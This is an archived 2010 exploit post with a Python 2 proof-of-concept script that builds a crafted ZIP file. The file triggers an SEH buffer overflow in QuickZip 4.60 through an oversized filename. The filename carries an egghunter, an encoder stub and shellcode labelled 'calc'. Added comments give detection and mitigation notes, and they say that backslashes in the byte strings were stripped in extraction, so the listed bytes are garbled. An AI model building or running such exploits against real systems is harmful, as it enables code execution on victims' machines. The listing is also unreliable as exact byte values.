QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC
Posted on 08 March 2010
# ==================================================================== QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit ====================================================================
#!/usr/bin/python
#
# ###############################################################################
# Exploit Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit
# Date : 9/3/2010
# Author : corelanc0d3r & mr_me
# Bug found by : corelanc0d3r (http://corelan.be:8800/)
# Software Link : http://www.quickzip.org/downloads.html
# Version : 4.60
# OS : Windows
# Tested on : XP SP3 En
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ###############################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# how does this work?
# http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/
"""Proof-of-concept archive generator for the 2010 QuickZip 4.x parsing overflow.

The script writes one crafted archive, ``cst.zip``, into the current working
directory and does nothing else locally. The archive holds a single entry whose
filename field is padded to several thousand bytes; per the author's header the
bug class is an SEH overwrite in QuickZip 4.60 (tested on Windows XP SP3 En),
triggered when that entry is parsed.

Notes for defenders and readers:

* Detection: the filename is padded to 4064 bytes plus ".txt" and the same
  string is written into both the local file header and the central-directory
  entry. A filename-length field of that size is far outside what a legitimate
  archiver emits and is a straightforward thing for archive-inspection tooling
  to flag.
* Mitigation: the affected version is given as 4.60; the generic defence for
  this vulnerability class is an updated or retired QuickZip build together
  with host-side memory-safety mitigations (DEP, SEH-overwrite protection).
* NOTE(review): as rendered on this page the byte strings below read
  "x50x4B..." with no backslashes - the escape sequences appear to have been
  stripped during extraction, so the literals as shown are plain ASCII text
  rather than the intended byte values. Do not treat any value in this listing
  as a verified byte sequence or reuse it as an indicator.
* The script is Python 2 (``print`` statements).
"""
# Banner output (Python 2 print statements); whitespace inside the art has
# been collapsed by the page rendering.
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit"
# Hand-built ZIP structures (no ``zipfile`` involved). The leading bytes are
# the standard signatures: header_1 begins with "PK 03 04" (local file header),
# header_2 with "PK 01 02" (central-directory entry) and header_3 with
# "PK 05 06" (end-of-central-directory record). The field layout that follows
# each signature cannot be verified from this garbled rendering (see the
# NOTE above), so individual offsets are deliberately left undocumented.
header_1 = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
            "x00x00x00x00x00x00x00x00xe4x0fx00x00x00")
header_2 = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
            "x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00"
            "x24x00x00x00x00x00x00x00")
header_3 = ("x50x4Bx05x06x00x00x00x00x01x00x01x00"
            "x12x10x00x00x02x10x00x00x00x00")
# pure ascii egghunter, thanks to skylined
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
            "9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");
# Second-stage payload, named "calc" by the author (presumably a calc.exe
# launcher - not confirmed here; the bytes are not decoded in this review).
calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
        "x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
        "x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
        "x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
        "x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
        "x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
        "x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
        "x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
        "x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
        "x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
        "x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
        "x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
        "x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
        "x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
        "x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
        "x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
        "x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
        "x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
        "x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
        "x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
        "x50x41x41");
# custom encoder (author's term; not analysed in this review)
encoder = ("x25x4Ax4Dx4Ex55"
           "x25x35x32x31x2A"
           "x2dx55x55x55x5f"
           "x2dx56x55x56x5f"
           "x2dx55x55x55x5e"
           "x50"
           "x25x4Ax4Dx4Ex55"
           "x25x35x32x31x2A"
           "x2dx2bx6ax32x53"
           "x2dx2ax6ax31x54"
           "x2dx2ax69x31x54"
           "x50" );
print "[+] Building PoC.."
# The crafted filename. It is assembled from fixed pieces at offsets chosen
# by the author (223, 294 and a total of 4064 before the ".txt" suffix); those
# offsets are specific to the tested QuickZip 4.60 build and are not derived
# or explained here. "W00TW00T" is presumably the marker the egghunter scans
# for (inferred from the variable names only).
lol = "x43" * 20
lol += egghunter
lol += "x41" * (223-len(lol))
lol += "x61"
lol += "x53"
lol += "x5c"
lol += encoder
lol += "x41" * (294-len(lol))
lol += "x73xf9x41x41"
lol += "x5cx53x46x00"
lol += "W00TW00T"
lol += calc
lol += "x42" * (4064-len(lol))
lol += ".txt"
# Archive layout: local header + name, central-directory entry + the same
# name, then the end-of-central-directory record. The entry carries no data.
exploit = header_1 + lol + header_2 + lol + header_3
# Output: a single archive written to the working directory under a fixed name.
mefile = open('cst.zip','w'); mefile.write(exploit); mefile.close()
print "[+] Exploit complete!"
# ~ - [ [ : Inj3ct0r : ] ]